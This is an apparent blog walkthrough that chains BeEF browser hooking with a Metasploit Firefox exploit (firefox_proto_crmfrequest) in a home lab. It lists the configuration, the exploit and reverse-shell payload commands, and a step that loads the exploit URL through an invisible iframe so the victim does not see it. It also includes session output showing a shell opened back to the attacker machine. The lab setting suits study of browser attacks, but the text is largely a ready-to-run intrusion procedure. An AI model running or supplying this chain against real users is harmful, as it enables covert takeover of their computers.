Using BEEF & Metasploit to pop a shell with Firefox on Linux

Ingredients

Bake the following VMs (I use VMware, I guess this will work with VirtualBox too but I haven't tried it)

• Kali Linux (of course)
• Ubuntu Hardy Heron 8.04.1 LTS
• Install Firefox 15.0.1

• For the purposes of this blog post, the Kali Linux VM has the IP address of 192.168.70.212 and the Ubuntu VM has 192.168.70.225, you will need to change this to suit your local setup
• I would use the NAT or Local Host-only networking configuration for your VMware setup

Kali Linux

• Check that BEEF is installed
• apt-get install beef-xss

• Enable metasploit integration
• Edit /etc/beef-xss/config.yaml
• Set metasploit:
              enable: true
• Edit /usr/share/beef-xss/extensions/metasploit/config.yaml
• Set host and callback_host to be the IP address of the external interface of your Kali Linux VM
• Start msfconsole and then issue the following command to enable the RPC server:
• load msgrpc ServerHost=<your IP address> Pass=abc123

• Start beef
• cd /usr/share/beef-xss
• beef -x
• You can now browse to the BEEF UI (user/pass: beef) and start hooking browsers! :-)
• http://127.0.0.1:3000/ui/panel

Ubuntu

• BEEF supplies you with two demo pages, I found the advanced one to be more reliable, so fire up Firefox 15.0.1 and browse to:
• http://192.168.70.212:3000/demos/butcher/index.html

• Your browser will now be hooked into BEEF, if you go back to your Kali VM and check out the BEEF panel, you should see your browser hooked there.
• There are all kinds of funky things that you can do, but for now, we're going to concentrate on popping a shell

Kali Linux

• Go to your running msfconsole and enter
• use exploit/multi/browser/firefox_proto_crmfrequest
• set PAYLOAD firefox/shell_reverse_tcp
• set LHOST 192.168.70.212
• exploit

• Now metasploit should be running the exploit server and it will provide you with a target URL (http://192.168.70.212:8080/GS0HRW52gQ5Vt), the next step is to get the victim browser to access it
• The stealthy way to do this is to get BEEF to generate an invisible iframe for you on the victim browser
• Go back to the BEEF panel and choose your hooked browser and then:
• Commands -> Misc -> Create invisible iframe
• In the URL, put the target URL you got from metasploit (e.g., http://192.168.70.212:8080/GS0HRW52gQ5Vt)
• You should now see the following output in msfconsole: 
• [*] 192.168.70.225 firefox_proto_crmfrequest - Gathering target information. 
• [*] 192.168.70.225 firefox_proto_crmfrequest - Sending response HTML. 
• [*] 192.168.70.225 firefox_proto_crmfrequest - Sending HTML [*] 192.168.70.225 firefox_proto_crmfrequest - Sending the malicious addon 
• [*] Command shell session 1 opened (192.168.70.212:4444 -> 192.168.70.225:46429) at 2014-04-04 12:11:44 +0100

• Congrats, you've now popped a shell! :-)
• Confirm with: sessions -l
• Start to interact with it with: sessions -i <session number>
• Try something like: 
• uname -a
  Linux vuln-client 2.6.24-26-generic #1 SMP Tue Dec 1 18:37:31 UTC 2009 i686 GNU/Linux
• Enjoy the pwnage, poppin' shells like you're at a seafood restaurant! ;-)